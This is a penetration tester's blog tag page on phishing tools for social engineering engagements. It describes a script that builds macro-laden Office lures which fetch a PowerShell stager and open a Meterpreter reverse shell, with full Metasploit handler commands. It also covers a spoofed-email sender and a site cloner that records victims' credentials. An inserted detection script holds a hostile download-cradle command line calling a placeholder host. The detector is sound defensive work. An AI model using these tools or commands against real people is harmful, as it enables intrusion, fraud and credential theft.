Posts Tagged ‘Social Engineering’

Phishing Toys

February 1, 2016

I wrote two scripts, with the help of a co-worker, that are useful in our social engineering engagements.

  • injectShell.py – This script generates Microsoft Office documents containing VBA code that uses PowerShell to obtain a Meterpreter reverse shell. Unlike some scripts I found, which require a Windows machine, this one runs on a Linux/Mac machine. It works by patching the hex bytes (IP address and port) in pre-generated Office documents.
  • sendEmail.py – This script sends spoofed emails to some SMTP servers.

The GitHub repository is at:
https://github.com/milo2012/Social-Engineering-Toys

injectShell.py

The script generates Office documents (xls, doc and ppt) containing VBA code that downloads and runs Invoke-Shellcode.ps1 (which creates a Meterpreter reverse shell back to the server) when the victim enables macros in the document.

You will need to run a handler for the windows/meterpreter/reverse_https payload on the attacker host.

$ ./msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST consulting.example.org
msf exploit(handler) > set LPORT 4443
msf exploit(handler) > set SessionCommunicationTimeout 0
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

Below is the help screen of the script.

$  python injectShell.py -h
usage: injectShell.py [-h] [-t T] [-o O] [-ip IP] [-port PORT]

optional arguments:
  -h, --help  show this help message and exit
  -t T        [xls|doc|ppt|all]
  -o O        [output filename (without extension)]
  -ip IP      [meterpreter listener ip address]
  -port PORT  [meterpreter listener port]

Below is the script in action.

$  python injectShell.py -t all -o salary -ip 192.168.1.6 -port 1111 
- Generated: salary.xls
- Generated: salary.doc
- Generated: salary.ppt
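The chain these documents produce (Office application spawns PowerShell, which downloads and runs Invoke-Shellcode.ps1) is what a defender looks for in process-creation telemetry. The detection logic below is an added example, not code from the post or the repository; the key="value" log format and the sample events are constructed for illustration.

```python
import re

# Office hosts a macro runs inside of, the interpreters it typically launches, and
# download-cradle markers (incl. the Invoke-Shellcode.ps1 stager the post describes).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-shellcode",
                  "invoke-expression", "iex ", "frombase64string", "-enc")

def parse_event(line):
    """Parse one key="value" process-creation event (assumed log format) into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))

def classify(event):
    """Return the reasons an event matches the macro-to-PowerShell chain (empty if none)."""
    parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("cmdline", "").lower()
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    if image == "powershell.exe" and any(m in cmdline for m in CRADLE_MARKERS):
        reasons.append("download/execute cradle in PowerShell command line")
    return reasons

def scan(lines):
    """Return (timestamp, host, reasons) for every suspicious event in the log."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = classify(ev)
        if reasons:
            hits.append((ev.get("ts"), ev.get("host"), reasons))
    return hits

# Constructed sample events, not real telemetry; the listener host name is the one in the post.
SAMPLE_LOG = [
    'ts="2016-02-01T10:02:11Z" host="WS01" parent="C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE"'
    ' image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'
    ' cmdline="powershell.exe -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString(\'https://consulting.example.org/Invoke-Shellcode.ps1\')"',
    'ts="2016-02-01T10:05:40Z" host="WS02" parent="C:\\Windows\\explorer.exe"'
    ' image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe Get-ChildItem C:\\temp"',
    'ts="2016-02-01T10:07:03Z" host="WS03" parent="C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE"'
    ' image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd.exe /c echo hi"',
]

for ts, host, reasons in scan(SAMPLE_LOG):
    print(ts, host, "; ".join(reasons))
```

The first rule fires on any Office-to-interpreter parent/child pair, so the Excel-to-cmd.exe event is flagged too, while the plain explorer.exe-launched PowerShell is not.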

sendEmail.py

This script sends spoofed emails to some SMTP servers, which can be useful in social engineering engagements.

Below is the help screen of the script.

$ python sendEmail.py -h
usage: sendEmail.py [-h] [-f F] [-n N] [-e E] [-t T] [-iL IL] [-v]

optional arguments:
  -h, --help  show this help message and exit
  -f F        [html file containing the email body]
  -n N        [recipient name]
  -e E        [recipient email]
  -t T        [delay between 1 to x seconds (random)]
  -iL IL      [file containing recipient name and email addresses per line
              separated by comma]
  -v          [verbose]

Below is the script in action.

$ python sendEmail.py -iL namelist.txt -f sampleHtml.txt -t 10
Sending email to: test01@example.com  

You can use the keywords @trackingCode and @user in the HTML email; they are replaced by the values listed in namelist.txt (see sampleHTML.txt for an example that uses both keywords).

  • @user is the victim’s name (1st field in namelist.txt)
  • @trackingCode is the individual code Phishing Frenzy assigns to each victim email address (3rd field in namelist.txt)

Below are two sample formats of namelist.txt.

Sample 1: the fields are separated by “,”. The first field is the recipient’s name and the second field is the recipient’s email address.

Keith,keith123@hotmail.com

Sample 2: the first field is the recipient’s name, the second field is the recipient’s email address, and the last field is the tracking code.

Keith,keith123@hotmail.com,UAG21E

Easily clone sites and import as Phishing Frenzy templates (Phishing for passwords)

January 22, 2016

Phishing Frenzy is an awesome tool to use during Social Engineering/Spear Phishing exercises.

One of the tasks I spent a lot of time on when using Phishing Frenzy is cloning a website to be used for phishing passwords.

Phishing Frenzy does have a ‘Website Cloner’, but it is pretty basic, and some work needs to be done on the generated HTML file before it can be used as a template (e.g. modifying the input names of the username and password fields, changing the form action URL, creating template.yml and attachments.yml, and zipping up the files).

I wrote a simple script that takes the URL of the website you want to clone (along with other information such as the Phishing Frenzy server URL and the fake domain name/public IP address of the server hosting the cloned website) and generates a working template zip that you can import directly into Phishing Frenzy under the Templates > Restore menu.

I hope this can be of help to any of you in future social engineering engagements.

Below is a screenshot of the script in action.

[Screenshot: phishing frenzy template zip generator]

When a user visits the cloned website and keys in credentials, the credentials are recorded in the creds.log file and also sent to your Phishing Frenzy server.

You can find the Python scripts at https://github.com/milo2012/phishing-frenzy-template-cloner
Thank you for reading.

Update: I have updated the template to include browser plugin enumeration via JavaScript. This should be useful for some. The information is sent back to your Phishing Frenzy server.